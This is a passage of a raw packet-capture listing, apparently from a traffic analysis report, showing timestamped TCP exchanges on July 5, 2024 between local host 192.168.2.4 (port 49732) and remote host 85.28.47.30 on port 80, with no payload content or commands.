                                                                Jul 5, 2024 04:23:17.736794949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.736804962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.736845016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.736886024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.736916065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.736927032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.736937046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.736948967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737021923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737025976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737046003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737056971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737060070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737082005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737101078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737140894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737150908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737162113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737173080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737184048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737193108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737200022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737220049 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737255096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737255096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737286091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737298965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737309933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737320900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737329960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737340927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737343073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737365007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737376928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737433910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737443924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737454891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737464905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737477064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737488031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737488031 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737497091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737500906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737510920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737525940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737540007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737809896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737821102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737832069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737864971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737884998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737896919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737907887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737925053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737936974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.737938881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737955093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.737982035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.741735935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741746902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741756916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741781950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.741808891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.741817951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741828918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741838932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741852045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741856098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.741880894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.741904020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.741969109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741978884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.741988897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742001057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742011070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742019892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742039919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742049932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742062092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742080927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742091894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742100954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742110968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742124081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742135048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742156029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742198944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742208004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742213964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742244005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742269993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742285967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742295980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742305994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742316961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742326975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742333889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742362976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742516994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742530107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742538929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742549896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742566109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742568016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742585897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742600918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742747068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742758036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742768049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742777109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742794037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742826939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.742959023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742969036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742978096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.742990017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743000031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743009090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743011951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743025064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743026018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743046045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743061066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743223906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743235111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743243933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743256092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743267059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743275881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743279934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743292093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743311882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743361950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743434906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743446112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743455887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743467093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743472099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743479013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743503094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743526936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743691921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743705034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743714094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743731976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743742943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743742943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743756056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743767023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743774891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743778944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743786097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743793964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743805885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743817091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743817091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743829012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.743841887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743860960 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.743884087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.744164944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.744175911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.744184017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.744210958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.744235992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.744611979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.744622946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.744663000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.746512890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.746522903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.746534109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.746562958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.746578932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.747910023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.747921944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.747931957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.747941971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.747975111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.747998953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.827517986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827528000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827555895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827572107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827579021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.827584982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827596903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827613115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.827624083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827632904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.827635050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827662945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.827836037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827888012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827898979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827936888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.827966928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827981949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.827991962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828002930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828018904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828032970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828037024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828044891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828054905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828080893 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828100920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828111887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828123093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828136921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828147888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828156948 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828156948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828178883 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828186035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828196049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828205109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828206062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828217983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828234911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828244925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828248024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828258038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828260899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828280926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828299999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828303099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828313112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828342915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828353882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828377962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828387976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828398943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828417063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828419924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828428984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828438997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828457117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828466892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828469038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.828476906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.828510046 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.832739115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832830906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832844973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832854986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832865953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832876921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832887888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832895041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.832931995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.832954884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.832994938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833015919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833025932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833061934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833075047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833090067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833100080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833111048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833128929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833141088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833142042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833153963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833156109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833168983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833182096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833192110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833209991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833297968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833308935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833318949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833328962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833338976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833347082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833350897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833360910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833364010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833375931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833380938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833388090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833395958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833398104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833405018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833412886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833427906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833440065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833463907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833478928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833488941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833498955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833508968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833522081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833534956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833555937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833722115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833765984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833777905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833787918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833822966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833853960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833864927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833874941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833887100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833899975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833913088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833915949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833925962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833936930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833951950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833962917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833971024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.833971977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.833985090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834001064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834008932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834050894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834109068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834120035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834130049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834140062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834151030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834155083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834162951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834166050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834178925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834191084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834194899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834203005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834212065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834224939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834235907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834243059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834245920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834260941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834266901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834280014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834287882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834290981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834302902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834330082 CEST4973280192.168.2.485.28.47.30
